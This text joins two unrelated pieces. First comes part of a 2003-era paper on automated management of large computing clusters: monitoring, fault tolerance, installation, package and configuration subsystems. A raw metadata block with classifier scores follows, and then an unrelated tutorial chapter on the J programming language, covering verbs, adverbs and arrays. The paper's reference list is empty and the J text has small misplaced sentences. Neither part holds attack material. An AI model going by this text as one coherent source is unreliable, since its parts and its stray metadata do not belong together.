- The Node Configuration Manager (NCM), which deploys the desired node configuration using a component framework.
- The Software Package Management Agent (SPMA), which handles local software installation.
- The software repository (SWRep), which contains the software packages that might be referenced from a desired configuration.

In the following sections the monitoring, fault tolerance, configuration and installation subsystems will be described in more detail.

### 3. SYSTEM MONITORING SUBSYSTEM

#### 3.1. Design

The different components of the monitoring subsystem [13] are shown in Figure 2. A Monitoring Sensor Agent (MSA) runs on all monitored nodes. It is responsible for calling the plug-in sensors to sample the configured metrics. The sampling frequency can be configured per metric. The interface is designed so that the sensor is not required to answer sampling requests and it may choose to trigger its own unsolicited samplings. The sensor communicates with the MSA using a simple text protocol. To hide the protocol details, a sensor API C++ class has been defined for convenience.

All monitoring data gathered on a node is stored in a local cache, which is available for local consumers of monitoring data. This is useful for local fault tolerance correlation engines. The monitoring data is also forwarded to a global measurement repository, where it is available for remote global consumers. The same externalized measurement repository API is used to access the data at both the local and global level.
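The repository API itself is a C library with bindings generated from the WSDL (see the status summary below). Purely to illustrate how a local or global consumer uses it, here is a Python-flavoured sketch in which the node name, metric name and method names are all invented:

```python
# Hypothetical consumer of the measurement repository API (names invented).
# The same pattern applies to the node-local cache and the global repository:
# time-series queries plus subscription/notification for new measurements.

def print_alarm(node, metric, timestamp, value):
    print(f"ALARM {node}/{metric} = {value} at {timestamp}")

def watch_load(repository):
    # one-off time-series query: the last hour of the 'cpu_load' metric
    samples = repository.query(node="lxbatch001", metric="cpu_load",
                               start="-1h", end="now")
    for timestamp, value in samples:
        print(timestamp, value)

    # subscription: the repository calls us back on every new measurement
    repository.subscribe(node="lxbatch001", metric="cpu_load",
                         callback=print_alarm)
```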
The repository API is implemented using SOAP RPC and provides methods for time-series queries and subscription/notification of new monitoring measurements. The sampling values are plain text strings and it is up to the consumer to correctly parse the values. While this can be perceived as cumbersome for simple single-number-valued metrics, it has the advantage that the metric values are unconstrained as long as they can be represented as printable text strings.

Figure 2: components of the monitoring system and how they are deployed.

The local cache is implemented as a flat text file database, with one file per metric per day. The file format is "timestamp value". The global measurement repository server provides an open interface (the same as the repository API) to plug in any backend database system. Database backend implementations for flat text files (the same as for the local cache) and Oracle currently exist. An interface to MySQL is being developed.

Figure 3: schematic picture of the TCP transport proxy mechanism.

The transport of monitoring data from the monitored nodes to the central repository is also pluggable. A UDP-based implementation has been in use at CERN for more than a year. A TCP-based implementation exists as a prototype. The TCP-based solution works over permanently open sockets and includes a proxy-like mechanism to fan out the open connections, so that the global repository holds connections to only a subset of the monitored nodes.

#### 3.2. Status

Monitored nodes:
- The Monitoring Sensor Agent (MSA) and the UDP-based transport protocol are ready and have been used on CERN production clusters for more than a year
- The TCP-based proprietary protocol exists as a prototype. More testing and functionality are needed before it is ready for production use

Central services:
- The repository server exists with both flat-file and Oracle database backends. The latter is currently being evaluated for production use at CERN. Support for MySQL is planned for later in 2003
- Alarm display: still in an early prototype phase

Repository API for local and global consumers:
- C library implementation of the API (same for local and global consumers)
- Bindings for other languages can be generated directly from the WSDL

### 4. FAULT TOLERANCE SUBSYSTEM

#### 4.1. Design

The components of the fault tolerance subsystem and how they interoperate with the monitoring subsystem are shown in Figure 4. Central to the fault tolerance system is the rule-based correlation engine allowing users/administrators to define sets of rules that are executed by the system. A rule determines exception conditions and maps them into actions to be executed. Arbitrarily complex exception conditions can be expressed using a simple but efficient language. The language offers the basic numerical and Boolean operations as well as string comparison. The language also provides the possibility to collect all kinds of data from a computing node, which then enters the expression as a variable. A web-based XML editor can be used for creating the rules.

The XML file defining the rule is copied to the nodes, where it is parsed by a local fault tolerance daemon consisting of a decision unit and an actuator agent. The decision unit parses the configured rules and is responsible for using the monitoring repository API to subscribe to all metrics needed by the rule. The monitoring system notifies the decision unit whenever there is a new measurement of the metrics. The decision unit then re-evaluates the rule.
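As an informal illustration of what such a rule amounts to (this is Python, not the actual rule language or its XML format; the metric names, thresholds and actuator command are invented):

```python
# Illustrative correlation rule. The decision unit re-evaluates the condition
# whenever the monitoring system delivers a new measurement; if it holds, the
# actuator agent runs the configured executable and feeds its exit status back
# as a metric, which is what makes retry and escalation rules possible.

import subprocess

RULE = {
    "metrics":   ["daemon_alive", "restart_attempts"],
    "condition": lambda m: m["daemon_alive"] == 0 and m["restart_attempts"] < 3,
    "actuator":  ["/bin/echo", "restarting mydaemon"],  # stands in for a repair script
}

def on_new_measurement(metrics, report):
    """Called by the monitoring subscription for each new sample."""
    if RULE["condition"](metrics):
        status = subprocess.call(RULE["actuator"])
        report("actuator_exit_status", status)   # back into the monitoring system

# example evaluation with fake measurements
on_new_measurement({"daemon_alive": 0, "restart_attempts": 1},
                   report=lambda name, value: print(name, "=", value))
```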
The actuator agent is called if an exception condition expressed by the rule is met. The actuator agent takes the output from the decision unit and determines which actuator to call. An actuator can be any executable command (binary or script) that is available on the node. The actuator agent launches the actuator and reports the return status of the actuator back to the monitoring system as a normal metric.

This feedback to the monitoring system is important. It allows tracing actions and it allows the correlation engine to be stateless. Retry loops can be created by defining a rule that takes the actuator return status metric as input. The feedback also allows for escalation of exceptions that cannot be solved locally.

#### 4.2. Status

The fault tolerance subsystem is not yet ready for production deployment, but a prototype was demonstrated working together with the fabric monitoring system at the EU review in February 2003. The setup included a Web-based rule editor and a central rule repository (MySQL) for managing the rules. On the local nodes a local fault tolerance daemon was deployed that
- Automatically subscribed to the monitoring metrics specified by the rules
- Launched the associated actuators when the correlation evaluated to an exception
- Reported back to the monitoring system the recovery actions taken and their status

Only local correlations (detection of a dead daemon followed by an automatic restart) were demonstrated at the review. Global (inter-node) correlations will be supported later.

### 5. INSTALLATION MANAGEMENT SUBSYSTEM

The installation management system ([3]) provides scalable solutions for the automated from-scratch installation, (re-)configuration, and software package distribution and management of large clusters.

#### 5.1. Automated Installation Infrastructure

The AII (Automated Installation Infrastructure) subsystem [4] provides tools for the management of standard vendor installation servers. This includes the configuration of network-related information, like the DHCP tables and the network bootstrap protocol (e.g. PXE for Intel/Linux and OpenBoot for Solaris). Also, the node-specific installation setup rules (KickStart for Linux and JumpStart for Solaris, respectively) have to be generated. The AII obtains its configuration either from the CDB (via the CCM), or from site-specific network databases.

#### 5.2. Node Configuration Management

The NCM (Node Configuration Management) subsystem [5] provides a framework for adapting the actual configuration of a node to its desired configuration, as described in the node's profile inside the CDB. Plug-in software modules called 'components' are responsible for the configuration of local services (e.g. network, sendmail, NFS), analogously to LCFG 'objects' [6] or SUE 'features' [7]. For this, they can read CDB configuration information via the CCM, and create/update/delete local service configuration files in order to match the CDB configuration description. Components register which configuration entries or subtrees they are interested in, and get notified in case of changes. Each component contains the knowledge for translating the CDB configuration into each local service's specific config file syntax. A component may also need to notify a service about a configuration change (e.g. by running a 'restart' or 'reload' method in a SysV init script).

The NCM subsystem contains the following modules:
- **cdispd**: The Configuration Dispatch Daemon (cdispd) monitors the node configuration profile by polling the CCM.
In case of changes in the configuration profile, the cdispd will invoke the affected components via the ncd.
- **ncd**: The Node Configuration Deployer (ncd) is the framework and front-end for executing the configuration components. The ncd can be executed manually, via cron, or via the cdispd. It takes care of configuration locking and inter-component dependency ordering prior to executing components sequentially.
- **Component support libraries**: Libraries for recurring system management tasks (system information, interfaces to system services, file editing), log file handling, the interface to Monitoring, etc.

#### 5.3. Software package management and distribution

The Software Package Management and Distribution (SPM) subsystem [8] is responsible for managing and storing software packages, and for the distribution and installation of these packages on client nodes. The SPM subsystem contains the following modules:

- **Software Repository**: The Software Repository (SWRep) module allows site administrators and package maintainers to store and manage software packages (like RPM or PKG packages) subject to authentication and authorization using ACLs. The packages themselves are accessible to the clients via standard protocols including HTTP, FTP, or using a shared file system. It is possible to have multiple (replicated or independent) Software Repository instances for a given fabric, allowing for load balancing, and also private per-department repositories. The replication of repositories can be done with standard tools like rsync.
- **SPMA**: The Software Package Manager Agent (SPMA) runs on the target nodes. It reads a local configuration file with the list of desired packages, compares it with the currently installed packages, computes the necessary install/deinstall/upgrade operations, and invokes the system packager (e.g. rpm\(^1\) on Linux, pkgadd/del on Solaris) with the right operation transaction set (a simplified sketch of this comparison is given at the end of this section).

  \(^1\) Since 'rpm' on Linux does not accept multiple simultaneous operation types, a new front-end called 'rpmt' (for transactional rpm) was developed, capable of handling multiple operations on multiple packages in a single transaction.

- **SPM component**: The information on which packages are to be deployed on which nodes (the desired or target configuration), and which packages are available on which repositories, can be kept in the CDB. The SPM component fits into the NCM framework described above. It retrieves the list of packages to be installed for the current node from the CDB via the CCM, uses this information to create a local configuration file for the SPMA, and launches the SPMA.

Typically, the SPMA is used for managing all packages on a node. This is useful for nodes which are under full control of the fabric management system. However, for add-on installations or desktop systems, the SPMA can be run in 'light' mode, taking care of a subset of packages only, according to configurable policies.

For performance and scalability reasons, the SPMA can use a local cache where packages can be stored ahead of time. This way, peak loads on software repository servers can be avoided during upgrades of large farms, while keeping consistency across the upgraded nodes. Also, the default transport protocol is set to HTTP for its scalability and low overhead.

#### 5.4. Status

The architectural design of the AII and NCM subsystems is finished; the detailed design and implementation are progressing, and a first prototype version of these subsystems will be available at the end of the summer. An integrated solution, including components for configuring the most common system services, is expected to be available by the end of September. A first production version of the SPM subsystem is being deployed on CERN's central batch and interactive services.
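As referenced above, the central computation of the SPMA can be sketched as follows. This is simplified Python, not the actual agent: real package descriptions also carry architectures, repositories and policy flags, and the real SPMA hands the resulting transaction to rpm or pkgadd/pkgrm.

```python
# Simplified version of the SPMA's core step: given the desired package set
# (from the node's configuration) and the currently installed set, derive the
# install / remove / upgrade operations to hand to the system packager in one
# transaction.

def spma_operations(desired, installed):
    """desired, installed: dicts mapping package name -> version."""
    to_install = {p: v for p, v in desired.items() if p not in installed}
    to_remove  = {p: v for p, v in installed.items() if p not in desired}
    to_upgrade = {p: (installed[p], v) for p, v in desired.items()
                  if p in installed and installed[p] != v}
    return to_install, to_remove, to_upgrade

desired   = {"openssh": "3.6.1", "kernel": "2.4.21", "monitoring-agent": "1.2"}
installed = {"openssh": "3.5.0", "kernel": "2.4.21", "old-tool": "0.9"}

install, remove, upgrade = spma_operations(desired, installed)
print("install:", install)   # {'monitoring-agent': '1.2'}
print("remove: ", remove)    # {'old-tool': '0.9'}
print("upgrade:", upgrade)   # {'openssh': ('3.5.0', '3.6.1')}
```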
### 6. CONFIGURATION MANAGEMENT SUBSYSTEM

#### 6.1. Design

The Configuration Management subsystem consists of the modules shown in Figure 6. The configuration information is stored centrally in the Configuration Database, CDB. The configuration of a particular node is delivered to that node as an XML profile and cached there by the Configuration Cache Manager (described below). Configuration information may also be accessed centrally through other means, e.g. via SQL or LDAP queries. This functionality is provided by the Server Modules.

The configuration information is structured in a tree format, and expressed with the High Level Description Language called Pan [9]. Pan mainly consists of statements that set a value for a configuration parameter identified by its path in the configuration information tree. Pan features include other statements like "include" (very similar to cpp's #include directive) or "delete", which removes a part of the configuration information tree. The grouping of statements into templates allows the sharing of common information and provides a simple inheritance mechanism.

Pan contains a very flexible typing mechanism. It has several built-in types (such as "boolean", "string", "long" and "double") and allows compound types to be built on top of these. Once the type of an element is known, the compiler makes sure that only values of the right type are assigned to it. To have even greater control over the information generated by the compiler, one can attach validation code to a type or to a configuration path. The validation code is written in a simple yet powerful data manipulation language which is a subset of Pan and syntactically similar to C or Perl.

The Configuration Database [10] stores two forms of configuration information. One is the High Level Description expressed in the Pan language. The other is the Low Level Description [11], expressed in XML. The system administrators can edit the High Level Description, either through a Command Line Interface (CLI) or a Graphical User Interface (GUI). There is also the possibility of having a scripting layer on top of the Configuration Database. The Low Level Description (one XML file per machine) is always generated using the Pan compiler.

The database works in a transactional way. It performs validation of the configuration information. Once the validation and compilation process is accomplished successfully, the changes introduced by the user are stored in the database and become visible to its clients. The Configuration Database also provides mechanisms for versioning and maintains the history of changes to the configuration information. The database itself includes a scalable distribution mechanism for the XML files based on HTTP, and the possibility of adding any number of back-ends (such as LDAP or SQL) – the Server Modules – to support various query patterns on the information stored. It should scale to millions of configuration parameters.

The Configuration Cache Manager runs on every node and caches the XML machine configuration (to support disconnected operations). Access to the information is provided through a Node View Access API [12] that hides details such as the XML schema used. The Manager may poll the Configuration Database for the configuration information. It also receives a UDP notification sent by the database if the machine's configuration changes.
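To make the idea of "statements that set a value at a path in the configuration tree" concrete, here is a toy Python sketch of compiling such statements into a per-node profile tree. It is not Pan syntax, and the paths, packages and values are invented; it only illustrates how path assignments, a crude include and a delete produce one nested configuration structure per node, which could then be serialized to XML.

```python
import json

# Toy illustration of the High Level Description idea: templates are lists of
# path statements; "compiling" them produces one nested configuration tree per
# node (the stand-in for the XML node profile).

base_template = [
    ("set", "/system/cluster/name", "lxbatch"),
    ("set", "/software/packages/openssh", "3.6.1"),
]

node_template = base_template + [            # crude stand-in for 'include'
    ("set", "/system/network/hostname", "node042"),
    ("delete", "/software/packages/openssh", None),
]

def compile_profile(statements):
    tree = {}
    for op, path, value in statements:
        parts = path.strip("/").split("/")
        node = tree
        for p in parts[:-1]:
            node = node.setdefault(p, {})
        if op == "set":
            node[parts[-1]] = value
        elif op == "delete":
            node.pop(parts[-1], None)
    return tree

print(json.dumps(compile_profile(node_template), indent=2))
```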
#### 6.2. Status

The Configuration Management subsystem is implemented except for the Command Line Interface and the Server Modules. Most of the components are in production versions. It is being deployed for LCG1 using the "PanGUIn" GUI. In parallel, the whole system is being consolidated. The issues of scalability and security are being studied and addressed. Currently, the Server Modules for XML replication and SQL access are being developed.

### 7. CONCLUSIONS AND OUTLOOK

In the first two years of the project the work was focused on surveying the existing solutions for automated management of large clusters, getting the architecture and design right, and implementing prototypes of the different subsystems. At the time of writing this paper, stable prototypes exist for all subsystems; some of them are already deployed at CERN and/or the EDG project testbed, and are presently being evaluated for production purposes:

- System monitoring: 1000 nodes being monitored, with 20 different MSA configurations (from 80 to 120 metrics per node), sending data to a central measurement repository.
- Configuration management: CDB in production status, holding site-wide, cluster- and node-specific configurations for 550 clients, totaling 1200 templates.
- Installation management and maintenance: First pilot of the Software Repository and SPMA being deployed in the CERN Computer Centre for the central CERN production (batch & interactive) services. All the nodes declared in the CDB are (re)installed using the SPMA, accessing packages from a replicated and load-balanced HTTP-based SWRep repository server cluster. The plan is to grow to ~1.5K nodes by the end of 2003.

Most of the changes required to move from the prototyping stage to production-quality tools are the result of the testing and evaluation period. No fundamental flaw has been found in the architecture so far. However, simulating real production use has proven to be the only efficient way of finding development bugs or needed functionality enhancements. Computing centers also have very high requirements on stability and reliability that can only be tested in a real environment. The users have been involved throughout the whole design and development process, but it is now that their collaboration becomes crucial.

The plans from now until the end of the project are focused on two areas. Firstly, the work on general aspects such as security, scalability, usability, graphical user interfaces, etc., needs to be completed. Secondly, the different fabric subsystems need to be "glued" together to build a consistent set of fabric management tools. Each subsystem has been implemented as a modular set of tools, which can be used independently according to user needs. Together, the tools will provide all the functionality needed to automatically manage medium-size to very large computing fabrics, as stated in the initial objectives.

### 8. ACKNOWLEDGMENTS

The authors wish to thank the EU and our national funding agencies for their support of this work.

### 9. REFERENCES
{"Source-Url": "http://www.slac.stanford.edu/econf/C0303241/proc/papers/MODT004.PDF", "len_cl100k_base": 5390, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 24141, "total-output-tokens": 6332, "length": "2e12", "weborganizer": {"__label__adult": 0.0003044605255126953, "__label__art_design": 0.0008225440979003906, "__label__crime_law": 0.00031065940856933594, "__label__education_jobs": 0.00103759765625, "__label__entertainment": 0.00010764598846435548, "__label__fashion_beauty": 0.00018656253814697263, "__label__finance_business": 0.0004703998565673828, "__label__food_dining": 0.000324249267578125, "__label__games": 0.0003800392150878906, "__label__hardware": 0.005680084228515625, "__label__health": 0.0004687309265136719, "__label__history": 0.0004973411560058594, "__label__home_hobbies": 0.0001971721649169922, "__label__industrial": 0.0015010833740234375, "__label__literature": 0.00021791458129882812, "__label__politics": 0.0002846717834472656, "__label__religion": 0.0005121231079101562, "__label__science_tech": 0.330322265625, "__label__social_life": 9.900331497192384e-05, "__label__software": 0.0304412841796875, "__label__software_dev": 0.62451171875, "__label__sports_fitness": 0.00022542476654052737, "__label__transportation": 0.0006647109985351562, "__label__travel": 0.00023484230041503904}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 29092, 0.02554]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 29092, 0.30256]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 29092, 0.86885]], "google_gemma-3-12b-it_contains_pii": [[0, 3917, false], [3917, 8114, null], [8114, 11738, null], [11738, 14388, null], [14388, 16371, null], [16371, 21406, null], [21406, 25056, null], [25056, 29092, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3917, true], [3917, 8114, null], [8114, 11738, null], [11738, 14388, null], [14388, 16371, null], [16371, 21406, null], [21406, 25056, null], [25056, 29092, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 29092, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 29092, null]], "pdf_page_numbers": [[0, 3917, 1], [3917, 8114, 2], [8114, 11738, 3], [11738, 14388, 4], [14388, 16371, 5], [16371, 21406, 6], [21406, 25056, 7], [25056, 29092, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 29092, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
b183e3615a690af0326efa79856365cc6b119484
In this chapter, we present the basic concepts of J. We introduce some of J's built-in functions and show how they can be applied to data objects. The principles presented in this book are supported by examples. The reader is therefore strongly advised to download and install a copy of the J interpreter from www.jsoftware.com.

2.1 Data Objects

Here, we give a brief introduction to data objects in J. Data objects come in a number of forms: scalars, vectors, matrices and higher-dimensional arrays. Scalars are single numbers (or characters); the examples below show values assigned to variable names:

```
i =: 3        NB. integer
j =: _1       NB. negative integer
x =: 1.5983   NB. real
y =: 22r7     NB. rational
z =: 2j3      NB. complex number
m =: _        NB. infinity
n =: __       NB. negative infinity
v =: 5x2      NB. exponential notation 5 * exp(2)
```

Note that negative numbers are denoted by an underscore (_) preceding the value rather than by a hyphen (-). An underscore on its own denotes infinity ∞, and two underscores denote negative infinity −∞. Variables are not limited to numerical values:

```
c =: 'hello world'
```

Variables can be evaluated by entering the variable name at the command prompt.

Scalars are called *atoms* (or *0-cells*) in J, and vectors are called lists or *1-cells*. The sequence of numbers below is an example of a list and is assigned to a variable name:

```j
dvc =: 1 1 2 3 5 8 13 21 34 55
```

The `i.` verb generates ascending integers from zero to \( n - 1 \), where \( n \) is the value of the argument. For example:

```j
z1 =: i.10    NB. generate list 0 to 9
```

The associated verb `i:` generates integers from \( -n \) to \( n \), thus:

```j
z2 =: i:5     NB. generate list -5 to 5
```

Matrices (tables in J) are 2-cell objects. Here is a table of complex numbers:

```j
j =: (i.6) j./ (i.6)
```

Matrices (of ascending integers) can be generated with the `i.` verb. The example below shows a \( 2 \times 3 \) matrix:

```j
i. 2 3        NB. generate a matrix
```

Higher-dimensional arrays are also possible; for example, an array of reciprocals with ascending denominators can be generated as a 3-cell data object: a three-dimensional array with three columns, four rows and two planes, where the planes are delimited by a blank line.

Scalars/atoms, vectors/lists and matrices/tables are just special instances of arrays with respective ranks zero, one and two. Table 2.1 shows the J terms for data objects and their mathematical equivalents. Throughout this book, we will use the J and mathematical terms interchangeably.

<table>
<thead>
<tr>
<th>J term</th>
<th>Mathematical term</th>
<th>Dimension</th>
<th>Object type</th>
</tr>
</thead>
<tbody>
<tr>
<td>atom</td>
<td>scalar</td>
<td>0</td>
<td>0-cell</td>
</tr>
<tr>
<td>list</td>
<td>vector</td>
<td>1</td>
<td>1-cell</td>
</tr>
<tr>
<td>table</td>
<td>matrix</td>
<td>2</td>
<td>2-cell</td>
</tr>
<tr>
<td>array</td>
<td>array</td>
<td>n</td>
<td>n-cell</td>
</tr>
</tbody>
</table>

Table 2.1. J versus mathematical terms

2.2 J Verbs

In J, functions are called verbs. J has a number of built-in verbs/functions; for example, the basic arithmetic operators are: +, -, *, % and ^, which are addition, subtraction, multiplication, division and power functions, respectively. Here are some (trivial) examples:

```
   2 + 3        NB. addition
5
   2 - 3        NB. subtraction
_1
   7 * 3        NB. multiplication
21
   2 % 7        NB. division: "%" is used instead of "/"
0.285714
```

In J, there is a subtle (but important) difference between _1 and -1.
The term _1 is the value minus one, whereas -1 is the negation function applied to (positive) one. Arithmetic can also be performed on lists of numbers:

```
   2 % 0 1 2 3 4          NB. divide scalar by a vector
_ 2 1 0.666667 0.5
   3 2 1 0 - 0 1 2 3      NB. pointwise vector subtraction
3 1 _1 _3
```

The example above also demonstrates how J deals with division by zero: any division by zero returns _ (∞). In addition to the basic arithmetic operators, J has many more primitives, for example:

```
   +: 1 2 3 4             NB. double
2 4 6 8
   -: 1 2 3 4             NB. halve
0.5 1 1.5 2
   %: 1 4 9 16            NB. square root
1 2 3 4
   *: 1 2 3 4             NB. squared
1 4 9 16
   >: _1 0 1 2 3          NB. increment
0 1 2 3 4
   <: _1 0 1 2 3          NB. decrement
_2 _1 0 1 2
```

Verbs are denoted by either a single character (such as addition +) or a pair of characters (such as double +:). Some primitives do use alphabetic characters, for example, the integers verb i. and the complex verb j., which were introduced above.

### 2.3 Monadic and Dyadic functions

Each verb in J possesses the property of *valence*, which relates to how many arguments a verb takes. *Monadic* verbs take one argument (and are therefore of valence one), whereas *dyadic* verbs take two arguments (valence two). Monadic verbs are expressed in the form \( f\ x \). The (single) argument \( x \) is passed to the right of the function \( f \). In functional notation, this is equivalent to \( f(x) \). In its dyadic form, \( f \) takes two arguments, which are passed to the function on either side: \( y\ f\ x \), equivalent to \( f(y, x) \) in functional notation.

J's verb symbols are overloaded; that is, they implement two separate (often related, but sometimes inverse) functions depending upon the valence. We use the % primitive to demonstrate. We have already seen it used in its dyadic form as a division operator. However, in its monadic form, % performs a reciprocal operation:

```
   % 2          NB. used monadically is reciprocal
0.5
   3 % 2        NB. used dyadically is division
1.5
```

Let us look at a few more examples. The monadic expression ^ x is the exponential function of x: \( e^x \). The dyad y ^ x, however, raises y to the power x, that is, \( y^x \). To illustrate:

```
   ^ 0 1 2 3            NB. used monadically is exp(x)
1 2.71828 7.38906 20.0855
   2 ^ 0 1 2 3          NB. used dyadically is y^x
1 2 4 8
```

Used monadically, <: performs a decrement function:

```
   <: 1 2 3 4 5 6
0 1 2 3 4 5
```

However, as a dyad it performs less-than-or-equal-to:

```
   4 <: 1 2 3 4 5 6
0 0 0 1 1 1
```

2.4 Positional Parameters

The meaning of a positional parameter is given by virtue of its relative position in a sequence of parameters. J does not really have a concept of positional parameters; however, we can pass positional parameters to functions as an ordered list of arguments. In this section, we introduce verbs for argument processing: left [ and right ]. These verbs return the left and right arguments, respectively:

```
   2 [ 3
2
   2 ] 3
3
```

Similarly, >: performs increment and greater-than-or-equal-to.
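The same overloading applies to >:. The short, hypothetical session below (written in the same style as the <: example above, and not taken from the book) shows the monadic and dyadic uses side by side:

```j
   >: 1 2 3 4 5 6        NB. used monadically: increment
2 3 4 5 6 7
   4 >: 1 2 3 4 5 6      NB. used dyadically: greater-than-or-equal-to
1 1 1 1 0 0
```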
The *right* verb provides a convenient means of displaying the result of an assignment:

```
   ] x =: i.10
0 1 2 3 4 5 6 7 8 9
```

The *left* verb can be used to execute two expressions on one line:

```
   x =: i.10 [ n =: 2    NB. assign x and n
   x ^ n
0 1 4 9 16 25 36 49 64 81
```

The verbs *head* {. and *tail* {: return the first element and the last element of a list (in the examples below, x holds the list of even numbers 0 2 4 6 8 10):

```
   {. x
0
   {: x
10
```

Conversely, *drop* }. and *curtail* }: remove the head and tail of a list, respectively, and return the remaining elements:

```
   }. x
2 4 6 8 10
   }: x
0 2 4 6 8
```

The *from* verb { is used to extract a particular element (or elements) from a list, by passing the index of the required element in the list as a left argument:

```
   0 { x
0
   2 { x
4
   3 1 5 { x
6 2 10
   0 0 0 1 2 2 2 3 3 4 5 5 5 5 { x
0 0 0 2 4 4 4 6 6 8 10 10 10 10
```

Lists can be combined with *stitch* ,. and *laminate* ,: in columns or rows, respectively. The J expressions below yield two matrices $m_1$ and $m_2$:

```
   ] m1 =: 1 2 3 4 ,. 5 6 7 8
1 5
2 6
3 7
4 8
```

We cover higher-dimensional objects in more detail in Section 2.6. Here, we look briefly at applying the *from* verb to matrices:

```
   ] m2 =: 1 2 3 4 ,: 5 6 7 8
1 2 3 4
5 6 7 8
```

Applied to a matrix, *from* returns whole rows: 2 { m1 returns the third row of m1, and 1 { m2 returns the second row of m2. If we wish to reference an individual scalar element, then we need to use *from* twice:

```
   0 { 1 { m2
5
```

In order to reference a column, we need to be able to change the *rank* of the verbs. The concept of rank will be covered in the next section.

Two data objects can be concatenated with *ravel* (,), for example:

```
   v1 =: 1 2 3 4
   v2 =: 5 6
   ] v3 =: v1 , v2
1 2 3 4 5 6
   0 3 4 5 { v3
1 4 5 6
```

This creates a single list of six elements (v3). There is no separation between the two original lists v1 and v2. If we wished to retain the separation of the two initial lists, then we combine them with the *link* verb ; , for example:

```
   ] v4 =: v1 ; v2
+-------+---+
|1 2 3 4|5 6|
+-------+---+
```

The lists are "boxed" and therefore exist as separate data objects. We can reference the two lists in the usual way:

```
   0 { v4
+-------+
|1 2 3 4|
+-------+
```

The data object returned is a single element; we cannot get at any of the individual scalar elements in the box:

```
   1 { 0 { v4
|index error
|   1    {0{v4
```

Use *open* > to unbox the object:

```
   > 0 { v4        NB. unbox v1
1 2 3 4
   1 { > 0 { v4
2
```

There is a corresponding inverse function, namely the monadic verb *box* <, which "groups" elements:

```
   < 1 2 3 4
+-------+
|1 2 3 4|
+-------+
```

Using the primitives described above, we define a number of functions for referencing positional parameters. These functions will be used a great deal in developing functions later in this book. Note that a couple of conjunctions are used here (& and @) which will be covered later, in Section 3.1.

```
lhs0 =: [            NB. all left arguments
lhs1 =: 0&{@lhs0     NB. 1st left argument
lhs2 =: 1&{@lhs0     NB. 2nd left argument
lhs3 =: 2&{@lhs0     NB. 3rd left argument
rhs0 =: ]            NB. all right arguments
rhs1 =: 0&{@rhs0     NB. 1st right argument
rhs2 =: 1&{@rhs0     NB. 2nd right argument
rhs3 =: 2&{@rhs0     NB. 3rd right argument
```

The functions lhs0 and rhs0 evaluate the left and right arguments, respectively.
The other functions are programmed to return positional parameters: lhs1 (respectively rhs1) returns the first positional parameter on the left-hand side (respectively right-hand side). We illustrate the use of positional parameters with the following example. Consider the classical M/M/1 queuing model given in Equation (1.6). We can write a function that takes the parameters \( \mu \) and \( \rho \) as left-hand and right-hand arguments, respectively:

```
   mm1 =: %@lhs1 % 1: - rhs0
   3 mm1 0.5 0.6 0.7 0.8 0.9
0.666667 0.833333 1.11111 1.66667 3.33333
```

2.5 Adverbs

The (default) behaviour of verbs can be altered by combining them with *adverbs*. We have already encountered an adverb in the summation function +/ . The *insert* adverb / causes + to be inserted between the elements of the argument, in this case, the individual (scalar) numbers in the list:

```
   +/ i.6                       NB. as we've seen before
15
   0 + 1 + 2 + 3 + 4 + 5        NB. and is equivalent to this
15
```

The dyadic case results in a matrix containing the sum of each element of the left argument with each element of the right argument:

```
   (i.6) +/ (i.6)
0 1 2 3 4 5
1 2 3 4 5 6
2 3 4 5 6 7
3 4 5 6 7 8
4 5 6 7 8 9
5 6 7 8 9 10
```

The *prefix* adverb \ causes the data object to be divided into sublists that increase in size from the left; the associated verb is then applied to each sublist in turn. We can see how the sublists are generated using the *box* verb:

```
   <\ i.5
+-+---+-----+-------+---------+
|0|0 1|0 1 2|0 1 2 3|0 1 2 3 4|
+-+---+-----+-------+---------+
```

A cumulative summation function can be implemented using the *insert* and *prefix* adverbs:

```
   +/\ i.6
0 1 3 6 10 15
```

This function will be useful later on when we wish to convert interval traffic arrival processes to cumulative traffic arrival processes. The *suffix* adverb \. operates on decreasing sublists of the argument:

```
   <\. i.6
+-----------+---------+-------+-----+---+-+
|0 1 2 3 4 5|1 2 3 4 5|2 3 4 5|3 4 5|4 5|5|
+-----------+---------+-------+-----+---+-+
```

The monadic *reflexive* adverb ~ duplicates the right-hand argument as the left-hand argument, so the J expression f~ x is equivalent to x f x, for example:

```
   +/~ i.6          NB. (i.6) +/ (i.6)
0 1 2 3 4 5
1 2 3 4 5 6
2 3 4 5 6 7
3 4 5 6 7 8
4 5 6 7 8 9
5 6 7 8 9 10
```

The ~ adverb also has a dyadic form (*passive*). This means that the left-hand and right-hand arguments are swapped; that is, y f~ x is equivalent to x f y. As an illustration:

```
   2 %~ i.6         NB. equivalent to (i.6) % 2
0 0.5 1 1.5 2 2.5
```

### 2.6 Rank, Shape and Arrays

Arithmetic can be performed between a scalar and a list, or between two lists, for example:

```
   2 * 0 1 2 3 4 5
0 2 4 6 8 10
   0 1 2 3 4 5 + 1 2 3 4 5 6
1 3 5 7 9 11
```

Notice that the lists have to be the same length; otherwise the J interpreter throws a "length error":

```
   9 8 - 0 1 2 3 4 5
|length error
|   9 8    -0 1 2 3 4 5
```

